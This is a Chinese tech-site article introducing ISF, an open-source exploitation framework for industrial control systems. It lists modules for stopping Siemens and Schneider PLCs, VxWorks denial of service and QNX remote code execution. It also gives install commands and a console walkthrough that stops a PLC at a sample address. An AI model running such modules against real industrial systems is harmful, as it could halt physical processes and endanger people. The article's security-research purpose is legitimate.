ISF:一款基于Python的工控系统漏洞利用框架

栏目: Python · 发布时间: 7年前

内容简介:ISF:一款基于Python的工控系统漏洞利用框架

今天给大家介绍一款名叫ISF的工具,它是一款针对工业控制系统的漏洞利用框架。该 工具 基于开源项目routersploit,采用 Python 语言开发,它跟MetaSploit框架有些相似,希望大家能够喜欢。

ISF:一款基于Python的工控系统漏洞利用框架

ICS(工业控制系统)协议客户端

名称 路径 Description
modbus_tcp_client icssploit/clients/modbus_tcp_client.py Modbus-TCP 客户端
wdb2_client icssploit/clients/wdb2_client.py WdbRPC Version 2 客户端 (Vxworks 6.x)
s7_client icssploit/clients/s7_client.py s7comm 客户端 (S7 300/400 PLC)

漏洞利用模块

Name Path Description
s7_300_400_plc_control exploits/plcs/siemens/s7_300_400_plc_control.py S7-300/400 PLC 启动/停止
vxworks_rpc_dos exploits/plcs/vxworks/vxworks_rpc_dos.py Vxworks RPC 远程DoS( CVE-2015-7599
quantum_140_plc_control exploits/plcs/schneider/quantum_140_plc_control.py Schneider Quantum 140 系列 PLC启动/停止
crash_qnx_inetd_tcp_service exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py Crash QNX Inetd TCP服务
qconn_remote_exec exploits/plcs/qnx/qconn_remote_exec.py QNX QCONN 远程代码执行

扫描器模块

Name Path Description
profinet-dcp-scan scanners/profinet-dcp-scan.py Profinet DCP 扫描器
vxworks_6_scan scanners/vxworks_6_scan.py Vxworks 6.x 扫描器
s7comm_scan scanners/s7comm_scan.py S7comm 扫描器

ICS协议模块(采用Scapy编写)

这些协议模块能够与其他的模糊测试框架(例如Kitty)进行整合,或者你也可以将其用于开发属于你自己的客户端工具。

Name Path Description
pn_dcp icssploit/protocols/pn_dcp Profinet DCP Protocol
modbus_tcp icssploit/protocols/modbus_tcp Modbus TCP Protocol
wdbrpc2 icssploit/protocols/wdbrpc2 WDB RPC Version 2 Protocol
s7comm icssploit/protocols/s7comm.py S7comm Protocol

框架安装

Python依赖环境

gnureadline(OSX only)

requests

paramiko

beautifulsoup4

pysnmp

python-nmap

scapy

在Kali Linux中安装

安装命令如下所示:

git clone https://github.com/dark-lbp/isf/

cd isf

python isf.py

工具使用

root@kali:~/Desktop/temp/isf#python isf.py

   

      _____ _____  _____ _____ _____  _     ____ _____ _______

     |_  _/ ____|/ ____/ ____|  __ \||    / __ \_   _|__  __|

       | || |   | (___| (___ | |__) | |   | |  | || |   | |

       | || |     \___ \\___ \|  ___/| |  | |  | || |    | |

      _| || |____ ____) |___) | |    | |___| |__| || |_   | |

     |_____\_____|_____/_____/|_|    |______\____/_____|  |_|

   

   

                    ICS Exploitation Framework

   

    Note    : ICSSPOLIT is fork from routersploit at

              https://github.com/reverse-shell/routersploit

    Dev Team : wenzhe zhu(dark-lbp)

    Version : 0.1.0

   

    Exploits: 2 Scanners: 0 Creds: 13

   

    ICS Exploits:

        PLC: 2          ICS Switch: 0

        Software: 0

   

    isf >

漏洞利用

isf> use exploits/plcs/

exploits/plcs/siemens/  exploits/plcs/vxworks/

isf> use exploits/plcs/siemens/s7_300_400_plc_control

exploits/plcs/siemens/s7_300_400_plc_control

isf> use exploits/plcs/siemens/s7_300_400_plc_control

isf(S7-300/400 PLC Control) >

注意事项:用户可使用Tab键实现命令补全。

选项

显示模块选项:

isf(S7-300/400 PLC Control) > show options

 

Targetoptions:

 

   Name      Current settings     Description

   ----      ----------------     -----------

   target                          Target address e.g.192.168.1.1

   port      102                  Target Port

 

 

Moduleoptions:

 

   Name       Current settings     Description

   ----       ----------------     -----------

   slot       2                    CPU slotnumber.

   command    1                    Command0:start plc, 1:stop plc.

 

 

isf(S7-300/400 PLC Control) >

设置选项:

isf(S7-300/400 PLC Control) > set target 192.168.70.210

[+]{'target': '192.168.70.210'}

执行模块:

isf(S7-300/400 PLC Control) > run

[*]Running module...

[+]Target is alive

[*]Sending packet to target

[*]Stop plc

isf(S7-300/400 PLC Control) >

显示模块信息:

isf(S7-300/400 PLC Control) > show info

 

Name:

S7-300/400PLC Control

 

Description:

UseS7comm command to start/stop plc.

 

Devices:

-  Siemens S7-300 and S7-400 programmable logiccontrollers (PLCs)

 

Authors:

-  wenzhe zhu <jtrkid[at]gmail.com>

 

References:

 

isf(S7-300/400 PLC Control) >

工具文档

1. Modbus-TCP 客户端工具使用说明

2. WDBRPCV2 客户端工具使用说明

3. S7 客户端工具使用说明

4. SNMP 爆破工具使用说明

5. S7 300/400 PLC 密码爆破工具使用说明

6. Vxworks 6.x 扫描器使用说明

7. Profient DCP 扫描使用说明

8. S7comm PLC 扫描器使用说明

9. 从额外的目录中读取 modules

10. 如何创建一个 module

* 参考来源: lastline ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

硅谷百年史

硅谷百年史

[美]阿伦·拉奥(Arun Rao)、[美]皮埃罗·斯加鲁菲(Piero Scarruffi) / 闫景立、侯爱华 / 人民邮电出版社 / 2014-4-1 / 99.00

一百多年来,仅硅谷就培育了50多位诺贝尔奖获得者,以及无数依靠智慧和知识而成为百万富翁的人。这一人类历史上最伟大的科技创新与创业历程为什么会发生在硅谷?究竟是如何发生的?其他地方是否可以复制出“硅谷”? 《硅谷百年史——伟大的科技创新与创业历程(1900-2013)》以编年体的顺序,从无线电技术、晶体管、集成电路,到人类基因组、互联网和云计算,详尽地记述了硅谷在100多年中所发生的重大科技事......一起来看看 《硅谷百年史》 这本书的介绍吧!

Base64 编码/解码
Base64 编码/解码

Base64 编码/解码

html转js在线工具
html转js在线工具

html转js在线工具

RGB HSV 转换
RGB HSV 转换

RGB HSV 互转工具